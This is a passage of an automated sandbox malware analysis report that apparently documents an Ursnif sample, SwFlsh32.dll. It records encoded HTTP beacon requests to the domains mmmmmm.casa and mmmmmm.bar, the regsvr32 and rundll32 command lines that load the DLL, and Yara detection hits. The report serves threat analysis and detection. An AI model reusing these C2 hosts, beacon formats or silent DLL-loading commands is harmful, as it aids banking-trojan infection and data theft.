                            Jan 12, 2022 11:14:12.738285065 CET12838OUTGET /drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtCBnG_2/B_2FIObD/HoDAL_2BFA8fwdPCks8bPvx/KOXH_2BIls/0Ry3fQgmhQH2tjL21/2VvKLDjxl_2B/D5jMgG7YliQ/d_2BQm9szBxhpm/DMhMK7yZ4LHz0oSIUsdVm/PE52_2F_2BI5AnjM/Vyp3_2BWfI5OR9d/6JhumiV_2BTYaEtfro/p8Q9LLFcC/ep5xT7x.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Jan 12, 2022 11:14:12.918787956 CET12839INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:14:12 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 326
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtCBnG_2/B_2FIObD/HoDAL_2BFA8fwdPCks8bPvx/KOXH_2BIls/0Ry3fQgmhQH2tjL21/2VvKLDjxl_2B/D5jMgG7YliQ/d_2BQm9szBxhpm/DMhMK7yZ4LHz0oSIUsdVm/PE52_2F_2BI5AnjM/Vyp3_2BWfI5OR9d/6JhumiV_2BTYaEtfro/p8Q9LLFcC/ep5xT7x.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 76 64 48 45 77 47 4b 4e 4a 44 48 35 56 74 68 48 6b 41 39 54 2f 5a 35 57 6d 6b 47 52 72 42 62 31 31 64 76 6a 69 55 4e 68 2f 57 78 69 5a 52 34 50 64 34 64 70 67 57 6f 75 64 36 47 6c 66 64 78 2f 58 31 31 38 49 77 74 43 42 6e 47 5f 32 2f 42 5f 32 46 49 4f 62 44 2f 48 6f 44 41 4c 5f 32 42 46 41 38 66 77 64 50 43 6b 73 38 62 50 76 78 2f 4b 4f 58 48 5f 32 42 49 6c 73 2f 30 52 79 33 66 51 67 6d 68 51 48 32 74 6a 4c 32 31 2f 32 56 76 4b 4c 44 6a 78 6c 5f 32 42 2f 44 35 6a 4d 67 47 37 59 6c 69 51 2f 64 5f 32 42 51 6d 39 73 7a 42 78 68 70 6d 2f 44 4d 68 4d 4b 37 79 5a 34 4c 48 7a 30 6f 53 49 55 73 64 56 6d 2f 50 45 35 32 5f 32 46 5f 32 42 49 35 41 6e 6a 4d 2f 56 79 70 33 5f 32 42 57 66 49 35 4f 52 39 64 2f 36 4a 68 75 6d 69 56 5f 32 42 54 59 61 45 74 66 72 6f 2f 70 38 51 39 4c 4c 46 63 43 2f 65 70 35 78 54 37 78 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtCBnG_2/B_2FIObD/HoDAL_2BFA8fwdPCks8bPvx/KOXH_2BIls/0Ry3fQgmhQH2tjL21/2VvKLDjxl_2B/D5jMgG7YliQ/d_2BQm9szBxhpm/DMhMK7yZ4LHz0oSIUsdVm/PE52_2F_2BI5AnjM/Vyp3_2BWfI5OR9d/6JhumiV_2BTYaEtfro/p8Q9LLFcC/ep5xT7x.jlk'>Found</a>.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            67192.168.2.649936198.54.117.21680C:\Windows\SysWOW64\regsvr32.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:32.315130949 CET12813OUTGET /drew/ObPEVjME/uTgl7EeI4pUIcVbTx37h32z/9JQSUI9yi4/tlbn0QAMwdOSinKCj/I_2FUWBt0Kof/eyVYoapjZjh/6Z9m96_2FiRZZq/Ef7PDUJU5SDC1JS1AwcbH/wQMnJUKA0IIbwi4C/FAIRf72ER0v7lod/lgatZ_2BAYH2QVOTor/mfaZi9AdI/vwqa913VT82YpdpouMjC/9nlGDg9K0WVIupxKjJ_/2B_2FQmERF6IRN4evAeoKu/OPglTmf_2/FSu.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            68192.168.2.649937198.54.117.21280C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:51.071866035 CET12818OUTGET /drew/f6jKcEUOj8A64/WvqMDEXc/MwmCt7DFVgxdimBO2LgEA0N/ZNXLxEI3Zd/gyEG1BIXvosDrJ_2B/tzo4yrPGybpk/bOXL_2FI4Gk/Dwg0zBI5Va0Vew/VcHtlW2fI_2FlIG4qwYDf/sVWPXPhigWsxWApv/e6KTeVe4jfgkgxB/EAe8o_2FKB_2BS7oKI/ttidUeBuR/ahC5CzjXBQ27gn4y5cPQ/02CG5Yjo_2F7m4jIX1c/yngrPaQmQFL5UmA/13qwwD.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            69192.168.2.649938198.54.117.21680C:\Windows\SysWOW64\regsvr32.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:51.111265898 CET12819OUTGET /drew/IVKP_2B6ZQQkG6g5/gfowffZhbmtN_2B/GZbbScWLQtb1lACgnt/rBntiTQwT/saL_2BBlUn86jR0XyTBo/7JNgQsItTPD2PHGzNKS/G1LTW9fRAA1zfD6_2FMiYB/dg960muYkdAwp/uG8HwcGL/8jG_2BjlGKWZrDL8vqOPVvC/htJk0fRuFB/CZluWe0HHNShwo8us/H7tsPluCA75g/aX_2F3vI3Tj/WjN30iGXtvxagL/uXBGZL_2FYgMxgH/PfB0165.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            7192.168.2.64977331.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:11:00.035780907 CET1208OUTGET /drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5aD/_2BaeC5gue46teo/Mz94QcIObLwkCmIFSe/AYyEx_2Ft/7flnx_2FeBMaKdb_2BZY/2QcUQ0KczFWXmzcms2u/KqZ09beQmNbj50XJX6IPpt/L8avESS6Nbmyi/27IxeLE_/2B4eudEcqYK8iUY7pnK_2BN/lez_2F9d6B/JO7dBHKHEfmL4H2lk/EeykEsbEse/f.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            70192.168.2.649939198.54.117.21680C:\Windows\SysWOW64\regsvr32.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:51.159193039 CET12820OUTGET /drew/cD2Ewm7iGqMWPOkoVh2Hr/lSdxksgYA4mJEN42/6hG4ODNyYAH539U/3fuQQ5LlKDI4bM1b7W/idcaoqxrd/pMXyUBd_2BzEIdIc0JYN/k0d7ofrjRiaIIgn2d7z/QSRTFXDfwTpnog_2FhKWZ2/I464QiuD2zIxn/gdmKXI_2/Bo1ItO7W8SANyxbK0_2B_2B/wmE9_2BVQd/_2FAFT722G6qgOYAX/qZ8FCQq56b14/eJnNZN9d6mJ/4SYZznClo/p0BGlI.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            71192.168.2.64994131.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:52.655339003 CET12827OUTGET /drew/b2TutLAUt/AAkTh80PEBTPVx2M0WWz/tHvwOMh8DE9FVgCx1wM/pJTiDXRlbJxqfbcaYjX5Aq/xCQnCU6grrmEK/Ka7HR80A/TmWv25imPh8Z_2BcgVOt5nj/QijDrP3tT2/6YeGxMk3j75w8Aikb/RCKd7NWKWRFy/_2FNkg_2Bmn/kDUMQ77ACMzaRB/KgTon1Dhj_2B6os2nyWq3/jAJbWCr5_2BhSnCM/GMDLVwQOesflZEg/izlI5VZPkbeCb/R6.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.bar
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            72192.168.2.64994231.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:14:11.318597078 CET12828OUTGET /drew/gX1_2FaI/PZ4luFioJpYPLuP8fVvt_2B/u_2B1y278F/NyvoV4yhw5FMBnKUz/nqgst_2BJTVr/gmszek7Tkgw/kY3_2Frm_2B9_2/Bt5smOqRl_2FbHG9pJMQ9/_2FSApE07JWo12ge/_2F2lc5upYPyphr/TuywFSg0WDyPNAgaSh/_2FSvG_2F/Irt_2BKEJPDAlX_2BG1S/CGpR1M06n3G6vhLO6R2/IxroSYxc7NGtcASjzUaI4b/fIQXTVLEVzFOr/XmDvptqg/KWMc56Q.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.bar
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            73192.168.2.64994331.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:14:11.369406939 CET12829OUTGET /drew/lQpAWLPQsOn/iwi15YGVBnOQpx/ACCjrHfe7Wo0P5JvKHDja/8dIy_2F3W_2F273e/h_2BsxpS6fputhm/wuxSDq8Sf7QGBArKTZ/CdKlNGATu/ui4Mkodu0v0T4w8lKhmy/ng26rinL5x2u14eDyK_/2FNgnMT1wD4br8QPNmANVh/XK61cOpXKAAqL/6zR60_2F/4QMU_2FGCGZwdCOQ5jmMpGq/Ie0CxUzI16/H_2Fje_2FQKEcdhm_/2BUE_2FR/WxCH4QgM/jZM.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.bar
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            74192.168.2.64994431.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:14:11.414874077 CET12830OUTGET /drew/hM1upiDM4s78JFaPrfyW/3DWkoBXDYr7rgMt3xG_/2BGXIAeEHHsslby_2Fk_2B/XjQKcdsES34ik/KzZh1W9x/wGh7y7hkYjEYiRmdk8ihMRh/wEuF5klCEc/N3ieIl5msFqHpr6e_/2BAkBe5SEk4L/PqlaOJaqYp2/r_2BNxFDTfZU3N/69EGFjEgSNPlZMLVgL6hR/Ck2ZFVOto0vLvnfh/AOtKkE_2B8SZijs/JwyVbX6V5aCtPQN9rn/_2BnFCD_2/F76.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.bar
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            75192.168.2.649946198.54.117.21680C:\Windows\SysWOW64\regsvr32.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:14:13.088994026 CET12839OUTGET /drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtCBnG_2/B_2FIObD/HoDAL_2BFA8fwdPCks8bPvx/KOXH_2BIls/0Ry3fQgmhQH2tjL21/2VvKLDjxl_2B/D5jMgG7YliQ/d_2BQm9szBxhpm/DMhMK7yZ4LHz0oSIUsdVm/PE52_2F_2BI5AnjM/Vyp3_2BWfI5OR9d/6JhumiV_2BTYaEtfro/p8Q9LLFcC/ep5xT7x.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            76192.168.2.649947198.54.117.21280C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:14:31.927917004 CET12844OUTGET /drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZxCNouRVbWyD_2BA0kUFL/Azh_2F37QJ8w5/_2F_2BHJ/YF_2B05Ux0nGHzUMeX6_2Be/Gj4AjkO056/z7zfXvOS0Ck9ij1T9/ivOOUShQT_2F/O9VYsyMhlJb/T4tSNfoaQI67_2/FGgXNRDCGCG5WTW5VVa0g/XJjtgZS8MSjTGuOi/Remmz7x4_2BJS/95Bf3HvZ/j.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            77192.168.2.649949198.54.117.21680C:\Windows\SysWOW64\regsvr32.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:14:31.940071106 CET12845OUTGET /drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I9tePbbl/e0WI0OeHAABDBK_2/BGgWBLhnrCwIX2a/eY2i6bDO1XsEiKpdI_/2Ffj5yrES/XUkdgF_2BtB7uvP86zoB/sUHzWtrofPT34R7CvQE/NrT4dtWcKFtgqYMAR1Chky/E9_2FFgkwTE3N/nmdTSRJk/40jKH8Kj7YfIW9Kkspchk3o/Mq7ak.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            78192.168.2.649948198.54.117.21680C:\Windows\SysWOW64\regsvr32.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:14:31.940589905 CET12845OUTGET /drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt0Nd7sD_2F4b/bp9jUjPyXDdZc_2FK0v/dPnfT6KZCI_2F04UJ3vQAP/bumYKjymhbjDK/LPqhtKzi/PG6vU8VyOAfE3kJoq_2FnmQ/686tSvRTaO/HG7aazopIFs0YU1L8/w3MPLoFg4vJR/s_2F_2F3_2F/eZehSHb27f_2Ff/LvnuNMT1_2BI6YAzztnWs/g1WQ4.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            79192.168.2.64995031.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:14:33.340958118 CET12846OUTGET /drew/JYo2yh7o/xmmHqBu82xYT0h_2FY7FLhd/BDSs1jeYDH/q9Uyq_2F_2F5Uhp3O/kDGBT1_2BMID/BPHuX8lkP85/MSE547sPVJP5Pb/uwpVWJ0_2F5KAGhPt59PK/XFYRWXuuFJDH1RPV/x9jUEqFvAJ3Kl42/dFOyZtqdeFkK81krpt/W07rXA9LO/_2FsUQUJNXTJZ08M4MsS/eUndP8BPShJYYavS5w3/OjNnZSisYNeZZTRn2Bu4BT/d35KR5_2FpO/eKZ.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.bar
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            8192.168.2.64977431.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:11:00.163161039 CET1209OUTGET /drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5aD/_2BaeC5gue46teo/Mz94QcIObLwkCmIFSe/AYyEx_2Ft/7flnx_2FeBMaKdb_2BZY/2QcUQ0KczFWXmzcms2u/KqZ09beQmNbj50XJX6IPpt/L8avESS6Nbmyi/27IxeLE_/2B4eudEcqYK8iUY7pnK_2BN/lez_2F9d6B/JO7dBHKHEfmL4H2lk/EeykEsbEse/f.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            80192.168.2.64995231.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:14:52.178426027 CET12848OUTGET /drew/X4p6u_2FetthGmAcz/bQsew8zG_2Fh/9P0GZIddIT6/tsqFDffw1JfZI9/7Wxh6S1430ERGHqXnGdSL/l2H1dC_2BJRz8P7u/WHLfWZFpRyuCPoH/N2btBoZMI6viPyh1IZ/3zpHhEkuK/H3QK2eSVqiaA4sXJAvW0/6PC2c0KwbRckfLHWg95/iUWpcL_2BkbYAUGuJiXEcw/5QgCHV4YQT1Aj/V_2FUI3k/q3ooEApLg6Zz6wvYePIaFqO/CEyO7MK.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.bar
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            81192.168.2.64995131.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:14:52.181541920 CET12848OUTGET /drew/pqebeo2lGkpXDanz/ytpUleK_2FpNL5M/WaawzvJzKNJXUgj1ad/bF_2B89Mv/JS92dYGkqfVf3KAsztIp/rbZR9n25d8s1swM9G24/POlK7PosNEdgyRGUG2gH4G/osPJ_2FYmTltK/5jx6Pdhk/9DHJnQIClt_2FzdZ9oWmGhV/bMMH_2BIn1/yEJsp_2FrcbHarv5V/n7FSL8uXWBw2/H_2Bf_2Fn_2/BR1KjYbSHqEZ_2/FMDrsqXqBz9zvxWljk5WA/R1oCBo4gMgLTWO4D/t_2Bn0elq/j7rqu.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.bar
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            82192.168.2.64995331.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:14:52.197376013 CET12849OUTGET /drew/QBjwt7f9IP4GJ_2FI3i/c0aa6REvsF1jEZ9Gt73OXW/MtCcAk2KHvQUZ/TFCEWwi_/2FYGGLslYtrvGnKIPgnCCn_/2Be4qngLZL/h7wQZV7ZkmYTr30Ro/f_2BtcFeUACa/x0nXv3li_2B/U9eDD3JfhJK72O/jxeUvRycWfEceGRC3MXTy/drNOOIK_2FtdvF1i/AmMumpioN5_2FP1/gKQv6LB4vbHzJub1s1/spDN5cRuN/AMK9KBM6v3hgq0vZhZSY/2SvQy6L_2F1v3G9XnYH/lj5TD.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.bar
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            9192.168.2.649785162.255.119.21980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:11:43.259551048 CET1304OUTGET /drew/mcyTA6nYo7I3Lz/Gg0KywBZ6ZMcybQpO6oFh/a_2Bz7Cxc8W0bVI_/2BZNTvU_2FIySan/m_2FNy1IRnoBB2dOL6/ewPhtQKmX/4vEptWmInKNSCCelbBJL/QsUTl3MG8W_2FUT5c4I/Wbyh4OWkqK5LNO5yhmAMAh/lEvQjX_2BglB2/ZgXdboWB/keU0AsD3UcwLpfPRqdjUowu/0EDp5luYWq/WPk0AaCP_2BNIdyuD/JX2Aa27OteSX/ayBPWZC0Qw7/E.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Jan 12, 2022 11:11:44.296376944 CET1305INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:11:44 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 320
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/mcyTA6nYo7I3Lz/Gg0KywBZ6ZMcybQpO6oFh/a_2Bz7Cxc8W0bVI_/2BZNTvU_2FIySan/m_2FNy1IRnoBB2dOL6/ewPhtQKmX/4vEptWmInKNSCCelbBJL/QsUTl3MG8W_2FUT5c4I/Wbyh4OWkqK5LNO5yhmAMAh/lEvQjX_2BglB2/ZgXdboWB/keU0AsD3UcwLpfPRqdjUowu/0EDp5luYWq/WPk0AaCP_2BNIdyuD/JX2Aa27OteSX/ayBPWZC0Qw7/E.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 6d 63 79 54 41 36 6e 59 6f 37 49 33 4c 7a 2f 47 67 30 4b 79 77 42 5a 36 5a 4d 63 79 62 51 70 4f 36 6f 46 68 2f 61 5f 32 42 7a 37 43 78 63 38 57 30 62 56 49 5f 2f 32 42 5a 4e 54 76 55 5f 32 46 49 79 53 61 6e 2f 6d 5f 32 46 4e 79 31 49 52 6e 6f 42 42 32 64 4f 4c 36 2f 65 77 50 68 74 51 4b 6d 58 2f 34 76 45 70 74 57 6d 49 6e 4b 4e 53 43 43 65 6c 62 42 4a 4c 2f 51 73 55 54 6c 33 4d 47 38 57 5f 32 46 55 54 35 63 34 49 2f 57 62 79 68 34 4f 57 6b 71 4b 35 4c 4e 4f 35 79 68 6d 41 4d 41 68 2f 6c 45 76 51 6a 58 5f 32 42 67 6c 42 32 2f 5a 67 58 64 62 6f 57 42 2f 6b 65 55 30 41 73 44 33 55 63 77 4c 70 66 50 52 71 64 6a 55 6f 77 75 2f 30 45 44 70 35 6c 75 59 57 71 2f 57 50 6b 30 41 61 43 50 5f 32 42 4e 49 64 79 75 44 2f 4a 58 32 41 61 32 37 4f 74 65 53 58 2f 61 79 42 50 57 5a 43 30 51 77 37 2f 45 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/mcyTA6nYo7I3Lz/Gg0KywBZ6ZMcybQpO6oFh/a_2Bz7Cxc8W0bVI_/2BZNTvU_2FIySan/m_2FNy1IRnoBB2dOL6/ewPhtQKmX/4vEptWmInKNSCCelbBJL/QsUTl3MG8W_2FUT5c4I/Wbyh4OWkqK5LNO5yhmAMAh/lEvQjX_2BglB2/ZgXdboWB/keU0AsD3UcwLpfPRqdjUowu/0EDp5luYWq/WPk0AaCP_2BNIdyuD/JX2Aa27OteSX/ayBPWZC0Qw7/E.jlk'>Found</a>.


                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            Analysis Process: loaddll32.exe PID: 6888 Parent PID: 5996

                            General

                            Start time:11:10:48
                            Start date:12/01/2022
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\SwFlsh32.dll"
                            Imagebase:0x260000
                            File size:116736 bytes
                            MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.413490977.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.413537323.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.871575841.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.413508620.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.413551793.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.413562057.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.522435374.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.413469441.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.413590499.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.413446258.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:moderate

                            Analysis Process: cmd.exe PID: 6900 Parent PID: 6888

                            General

                            Start time:11:10:48
                            Start date:12/01/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1
                            Imagebase:0x2a0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: regsvr32.exe PID: 6916 Parent PID: 6888

                            General

                            Start time:11:10:49
                            Start date:12/01/2022
                            Path:C:\Windows\SysWOW64\regsvr32.exe
                            Wow64 process (32bit):true
                            Commandline:regsvr32.exe /s C:\Users\user\Desktop\SwFlsh32.dll
                            Imagebase:0x160000
                            File size:20992 bytes
                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375865630.0000000005748000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375941264.0000000005748000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375998345.0000000005748000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375960218.0000000005748000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.376010591.0000000005748000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375719746.0000000005748000.00000004.00000040.sdmp, Author: Joe Security
